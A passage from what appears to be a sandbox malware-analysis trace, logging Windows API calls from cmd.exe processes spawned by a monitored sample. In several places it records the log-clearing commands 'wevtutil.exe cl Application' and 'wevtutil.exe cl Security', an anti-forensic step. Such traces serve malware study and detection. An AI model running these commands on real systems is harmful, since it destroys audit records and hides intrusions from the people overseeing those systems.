lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wevtutil.exe cl Application", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14f270 | out: lpCommandLine="wevtutil.exe cl Application", lpProcessInformation=0x14f270*(hProcess=0x54, hThread=0x50, dwProcessId=0xa3c, dwThreadId=0xb60)) returned 1 [0089.562] CloseHandle (hObject=0x50) returned 1 [0089.562] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0089.562] GetProcessHeap () returned 0x300000 [0089.562] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31cbd0 | out: hHeap=0x300000) returned 1 [0089.562] GetEnvironmentStringsW () returned 0x31cbd0* [0089.562] GetProcessHeap () returned 0x300000 [0089.562] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xae8) returned 0x31aa00 [0089.562] FreeEnvironmentStringsW (penv=0x31cbd0) returned 1 [0089.562] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0090.298] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x14f1b8 | out: lpExitCode=0x14f1b8*=0x0) returned 1 [0090.299] CloseHandle (hObject=0x54) returned 1 [0090.299] _vsnwprintf (in: _Buffer=0x14f428, _BufferCount=0x13, _Format="%08X", _ArgList=0x14f1c8 | out: _Buffer="00000000") returned 8 [0090.299] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0090.299] GetProcessHeap () returned 0x300000 [0090.299] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31aa00 | out: hHeap=0x300000) returned 1 [0090.299] GetEnvironmentStringsW () returned 0x31dfc0* [0090.299] GetProcessHeap () returned 0x300000 [0090.299] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xb0e) returned 0x31aa00 [0090.299] FreeEnvironmentStringsW (penv=0x31dfc0) returned 1 [0090.299] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0090.299] GetProcessHeap () returned 0x300000 [0090.299] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31aa00 | out: hHeap=0x300000) returned 1 [0090.299] GetEnvironmentStringsW () returned 0x31dfc0* [0090.299] GetProcessHeap () returned 0x300000 [0090.299] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xb0e) returned 0x31aa00 [0090.299] FreeEnvironmentStringsW (penv=0x31dfc0) returned 1 [0090.299] GetProcessHeap () returned 0x300000 [0090.299] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x318360 | out: hHeap=0x300000) returned 1 [0090.299] DeleteProcThreadAttributeList (in: lpAttributeList=0x14f288 | out: lpAttributeList=0x14f288) [0090.299] _get_osfhandle (_FileHandle=1) returned 0x7 [0090.299] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0090.299] _get_osfhandle (_FileHandle=1) returned 0x7 [0090.299] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a24e194 | out: lpMode=0x4a24e194) returned 1 [0090.300] _get_osfhandle (_FileHandle=0) returned 0x3 [0090.300] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a24e198 | out: lpMode=0x4a24e198) returned 1 [0090.300] SetConsoleInputExeNameW () returned 0x1 [0090.300] GetConsoleOutputCP () returned 0x1b5 [0090.300] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a25bfe0 | out: lpCPInfo=0x4a25bfe0) returned 1 [0090.300] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0090.300] exit (_Code=0) Process: id = "17" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x79e0a000" os_pid = "0xb04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa44" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" cmd.exe /C wevtutil.exe cl Security" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 151 os_tid = 0xb1c [0089.903] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14faf0 | out: lpSystemTimeAsFileTime=0x14faf0*(dwLowDateTime=0x48317d80, dwHighDateTime=0x18d1aee)) [0089.903] GetCurrentProcessId () returned 0xb04 [0089.903] GetCurrentThreadId () returned 0xb1c [0089.903] GetTickCount () returned 0x25791 [0089.903] QueryPerformanceCounter (in: lpPerformanceCount=0x14faf8 | out: lpPerformanceCount=0x14faf8*=21017186459) returned 1 [0089.904] GetModuleHandleW (lpModuleName=0x0) returned 0x4a220000 [0089.905] __set_app_type (_Type=0x1) [0089.905] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a247810) returned 0x0 [0089.905] __getmainargs (in: _Argc=0x4a26a608, _Argv=0x4a26a618, _Env=0x4a26a610, _DoWildCard=0, _StartInfo=0x4a24e0f4 | out: _Argc=0x4a26a608, _Argv=0x4a26a618, _Env=0x4a26a610) returned 0 [0089.905] GetCurrentThreadId () returned 0xb1c [0089.905] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb1c) returned 0x3c [0089.905] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0089.905] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0089.905] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0089.906] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0089.906] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fa88 | out: phkResult=0x14fa88*=0x0) returned 0x2 [0089.906] VirtualQuery (in: lpAddress=0x14fa70, lpBuffer=0x14f9f0, dwLength=0x30 | out: lpBuffer=0x14f9f0*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0089.906] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f9f0, dwLength=0x30 | out: lpBuffer=0x14f9f0*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0089.906] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f9f0, dwLength=0x30 | out: lpBuffer=0x14f9f0*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0089.906] VirtualQuery (in: lpAddress=0x54000, lpBuffer=0x14f9f0, dwLength=0x30 | out: lpBuffer=0x14f9f0*(BaseAddress=0x54000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0089.906] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f9f0, dwLength=0x30 | out: lpBuffer=0x14f9f0*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0089.906] GetConsoleOutputCP () returned 0x1b5 [0089.907] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a25bfe0 | out: lpCPInfo=0x4a25bfe0) returned 1 [0089.908] SetConsoleCtrlHandler (HandlerRoutine=0x4a243184, Add=1) returned 1 [0089.908] _get_osfhandle (_FileHandle=1) returned 0x7 [0089.908] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0089.909] _get_osfhandle (_FileHandle=1) returned 0x7 [0089.909] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a24e194 | out: lpMode=0x4a24e194) returned 1 [0089.909] _get_osfhandle (_FileHandle=1) returned 0x7 [0089.909] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0089.910] _get_osfhandle (_FileHandle=0) returned 0x3 [0089.910] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a24e198 | out: lpMode=0x4a24e198) returned 1 [0089.910] _get_osfhandle (_FileHandle=0) returned 0x3 [0089.910] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0089.910] GetEnvironmentStringsW () returned 0x1d8af0* [0089.910] GetProcessHeap () returned 0x1c0000 [0089.910] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xa7c) returned 0x1d9580 [0089.910] FreeEnvironmentStringsW (penv=0x1d8af0) returned 1 [0089.910] GetProcessHeap () returned 0x1c0000 [0089.910] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x8) returned 0x1d8370 [0089.910] GetEnvironmentStringsW () returned 0x1d8af0* [0089.910] GetProcessHeap () returned 0x1c0000 [0089.910] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xa7c) returned 0x1da010 [0089.910] FreeEnvironmentStringsW (penv=0x1d8af0) returned 1 [0089.910] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e948 | out: phkResult=0x14e948*=0x44) returned 0x0 [0089.911] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e940, lpData=0x14e960, lpcbData=0x14e944*=0x1000 | out: lpType=0x14e940*=0x0, lpData=0x14e960*=0x18, lpcbData=0x14e944*=0x1000) returned 0x2 [0089.911] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e940, lpData=0x14e960, lpcbData=0x14e944*=0x1000 | out: lpType=0x14e940*=0x4, lpData=0x14e960*=0x1, lpcbData=0x14e944*=0x4) returned 0x0 [0089.911] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e940, lpData=0x14e960, lpcbData=0x14e944*=0x1000 | out: lpType=0x14e940*=0x0, lpData=0x14e960*=0x1, lpcbData=0x14e944*=0x1000) returned 0x2 [0089.911] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e940, lpData=0x14e960, lpcbData=0x14e944*=0x1000 | out: lpType=0x14e940*=0x4, lpData=0x14e960*=0x0, lpcbData=0x14e944*=0x4) returned 0x0 [0089.911] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e940, lpData=0x14e960, lpcbData=0x14e944*=0x1000 | out: lpType=0x14e940*=0x4, lpData=0x14e960*=0x40, lpcbData=0x14e944*=0x4) returned 0x0 [0089.911] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e940, lpData=0x14e960, lpcbData=0x14e944*=0x1000 | out: lpType=0x14e940*=0x4, lpData=0x14e960*=0x40, lpcbData=0x14e944*=0x4) returned 0x0 [0089.911] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e940, lpData=0x14e960, lpcbData=0x14e944*=0x1000 | out: lpType=0x14e940*=0x0, lpData=0x14e960*=0x40, lpcbData=0x14e944*=0x1000) returned 0x2 [0089.911] RegCloseKey (hKey=0x44) returned 0x0 [0089.911] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e948 | out: phkResult=0x14e948*=0x44) returned 0x0 [0089.911] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e940, lpData=0x14e960, lpcbData=0x14e944*=0x1000 | out: lpType=0x14e940*=0x0, lpData=0x14e960*=0x40, lpcbData=0x14e944*=0x1000) returned 0x2 [0089.911] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e940, lpData=0x14e960, lpcbData=0x14e944*=0x1000 | out: lpType=0x14e940*=0x4, lpData=0x14e960*=0x1, lpcbData=0x14e944*=0x4) returned 0x0 [0089.911] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e940, lpData=0x14e960, lpcbData=0x14e944*=0x1000 | out: lpType=0x14e940*=0x0, lpData=0x14e960*=0x1, lpcbData=0x14e944*=0x1000) returned 0x2 [0089.911] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e940, lpData=0x14e960, lpcbData=0x14e944*=0x1000 | out: lpType=0x14e940*=0x4, lpData=0x14e960*=0x0, lpcbData=0x14e944*=0x4) returned 0x0 [0089.911] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e940, lpData=0x14e960, lpcbData=0x14e944*=0x1000 | out: lpType=0x14e940*=0x4, lpData=0x14e960*=0x9, lpcbData=0x14e944*=0x4) returned 0x0 [0089.911] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e940, lpData=0x14e960, lpcbData=0x14e944*=0x1000 | out: lpType=0x14e940*=0x4, lpData=0x14e960*=0x9, lpcbData=0x14e944*=0x4) returned 0x0 [0089.911] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e940, lpData=0x14e960, lpcbData=0x14e944*=0x1000 | out: lpType=0x14e940*=0x0, lpData=0x14e960*=0x9, lpcbData=0x14e944*=0x1000) returned 0x2 [0089.911] RegCloseKey (hKey=0x44) returned 0x0 [0089.911] time (in: timer=0x0 | out: timer=0x0) returned 0x1ad63547d19 [0089.911] srand (_Seed=0x63547d19) [0089.911] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" cmd.exe /C wevtutil.exe cl Security" [0089.911] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" cmd.exe /C wevtutil.exe cl Security" [0089.912] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a25c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0089.912] GetProcessHeap () returned 0x1c0000 [0089.912] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x218) returned 0x1daaa0 [0089.912] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1daab0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0089.912] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0089.912] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0089.912] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0089.912] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0089.912] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0089.912] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0089.912] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0089.912] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0089.912] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0089.912] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0089.912] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0089.912] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0089.912] GetProcessHeap () returned 0x1c0000 [0089.912] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1d9580 | out: hHeap=0x1c0000) returned 1 [0089.912] GetEnvironmentStringsW () returned 0x1d8af0* [0089.912] GetProcessHeap () returned 0x1c0000 [0089.912] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xa94) returned 0x1db760 [0089.913] FreeEnvironmentStringsW (penv=0x1d8af0) returned 1 [0089.913] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0089.913] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0089.913] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0089.913] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0089.913] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0089.913] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0089.913] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0089.913] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0089.913] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0089.913] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0089.913] GetProcessHeap () returned 0x1c0000 [0089.913] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x5c) returned 0x1c1320 [0089.913] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f750 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0089.913] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x14f750, lpFilePart=0x14f730 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14f730*="Desktop") returned 0x25 [0089.913] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0089.913] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f460 | out: lpFindFileData=0x14f460*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x409658c0, ftLastAccessTime.dwHighDateTime=0x18d1aee, ftLastWriteTime.dwLowDateTime=0x409658c0, ftLastWriteTime.dwHighDateTime=0x18d1aee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xdd0000dd, cFileName="Users", cAlternateFileName="")) returned 0x1d8950 [0089.913] FindClose (in: hFindFile=0x1d8950 | out: hFindFile=0x1d8950) returned 1 [0089.913] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x14f460 | out: lpFindFileData=0x14f460*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x409658c0, ftLastAccessTime.dwHighDateTime=0x18d1aee, ftLastWriteTime.dwLowDateTime=0x409658c0, ftLastWriteTime.dwHighDateTime=0x18d1aee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xdd0000dd, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x1d8950 [0089.913] FindClose (in: hFindFile=0x1d8950 | out: hFindFile=0x1d8950) returned 1 [0089.914] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0089.914] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x14f460 | out: lpFindFileData=0x14f460*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3d5798e0, ftLastAccessTime.dwHighDateTime=0x18d1aee, ftLastWriteTime.dwLowDateTime=0x3d5798e0, ftLastWriteTime.dwHighDateTime=0x18d1aee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xdd0000dd, cFileName="Desktop", cAlternateFileName="")) returned 0x1d8950 [0089.914] FindClose (in: hFindFile=0x1d8950 | out: hFindFile=0x1d8950) returned 1 [0089.914] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0089.914] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0089.914] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0089.914] GetProcessHeap () returned 0x1c0000 [0089.914] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1db760 | out: hHeap=0x1c0000) returned 1 [0089.914] GetEnvironmentStringsW () returned 0x1d8af0* [0089.914] GetProcessHeap () returned 0x1c0000 [0089.914] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xae8) returned 0x1dacc0 [0089.914] FreeEnvironmentStringsW (penv=0x1d8af0) returned 1 [0089.914] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a25c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0089.914] GetProcessHeap () returned 0x1c0000 [0089.914] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1c1320 | out: hHeap=0x1c0000) returned 1 [0089.914] GetProcessHeap () returned 0x1c0000 [0089.914] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x4016) returned 0x1dccf0 [0089.914] GetProcessHeap () returned 0x1c0000 [0089.914] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x46) returned 0x1e0d40 [0089.915] GetProcessHeap () returned 0x1c0000 [0089.915] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1dccf0 | out: hHeap=0x1c0000) returned 1 [0089.915] GetConsoleOutputCP () returned 0x1b5 [0089.915] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a25bfe0 | out: lpCPInfo=0x4a25bfe0) returned 1 [0089.915] GetUserDefaultLCID () returned 0x409 [0089.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a257b50, cchData=8 | out: lpLCData=":") returned 2 [0089.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f860, cchData=128 | out: lpLCData="0") returned 2 [0089.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f860, cchData=128 | out: lpLCData="0") returned 2 [0089.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f860, cchData=128 | out: lpLCData="1") returned 2 [0089.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a26a740, cchData=8 | out: lpLCData="/") returned 2 [0089.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a26a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0089.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a26a460, cchData=32 | out: lpLCData="Tue") returned 4 [0089.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a26a420, cchData=32 | out: lpLCData="Wed") returned 4 [0089.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a26a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0089.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a26a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0089.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a26a360, cchData=32 | out: lpLCData="Sat") returned 4 [0089.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a26a700, cchData=32 | out: lpLCData="Sun") returned 4 [0089.916] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a257b40, cchData=8 | out: lpLCData=".") returned 2 [0089.916] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a26a4e0, cchData=8 | out: lpLCData=",") returned 2 [0089.916] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0089.916] GetProcessHeap () returned 0x1c0000 [0089.916] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x20c) returned 0x1e1d80 [0089.916] GetConsoleTitleW (in: lpConsoleTitle=0x1e1d80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0089.917] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0089.917] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0089.917] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0089.917] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0089.917] GetProcessHeap () returned 0x1c0000 [0089.917] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x4012) returned 0x1dccf0 [0089.917] GetProcessHeap () returned 0x1c0000 [0089.917] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1dccf0 | out: hHeap=0x1c0000) returned 1 [0089.918] _wcsicmp (_String1="wevtutil.exe", _String2=")") returned 78 [0089.918] _wcsicmp (_String1="FOR", _String2="wevtutil.exe") returned -17 [0089.918] _wcsicmp (_String1="FOR/?", _String2="wevtutil.exe") returned -17 [0089.918] _wcsicmp (_String1="IF", _String2="wevtutil.exe") returned -14 [0089.918] _wcsicmp (_String1="IF/?", _String2="wevtutil.exe") returned -14 [0089.918] _wcsicmp (_String1="REM", _String2="wevtutil.exe") returned -5 [0089.918] _wcsicmp (_String1="REM/?", _String2="wevtutil.exe") returned -5 [0089.918] GetProcessHeap () returned 0x1c0000 [0089.918] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xb0) returned 0x1db7b0 [0089.918] GetProcessHeap () returned 0x1c0000 [0089.918] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x2a) returned 0x1d6520 [0089.918] GetProcessHeap () returned 0x1c0000 [0089.918] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x2a) returned 0x1d6560 [0089.919] GetConsoleTitleW (in: lpConsoleTitle=0x14f770, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0089.920] GetFileAttributesW (lpFileName="wevtutil.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wevtutil.exe")) returned 0xffffffff [0089.920] _wcsicmp (_String1="wevtutil", _String2="DIR") returned 19 [0089.920] _wcsicmp (_String1="wevtutil", _String2="ERASE") returned 18 [0089.920] _wcsicmp (_String1="wevtutil", _String2="DEL") returned 19 [0089.920] _wcsicmp (_String1="wevtutil", _String2="TYPE") returned 3 [0089.920] _wcsicmp (_String1="wevtutil", _String2="COPY") returned 20 [0089.920] _wcsicmp (_String1="wevtutil", _String2="CD") returned 20 [0089.920] _wcsicmp (_String1="wevtutil", _String2="CHDIR") returned 20 [0089.920] _wcsicmp (_String1="wevtutil", _String2="RENAME") returned 5 [0089.920] _wcsicmp (_String1="wevtutil", _String2="REN") returned 5 [0089.920] _wcsicmp (_String1="wevtutil", _String2="ECHO") returned 18 [0089.920] _wcsicmp (_String1="wevtutil", _String2="SET") returned 4 [0089.920] _wcsicmp (_String1="wevtutil", _String2="PAUSE") returned 7 [0089.920] _wcsicmp (_String1="wevtutil", _String2="DATE") returned 19 [0089.920] _wcsicmp (_String1="wevtutil", _String2="TIME") returned 3 [0089.920] _wcsicmp (_String1="wevtutil", _String2="PROMPT") returned 7 [0089.920] _wcsicmp 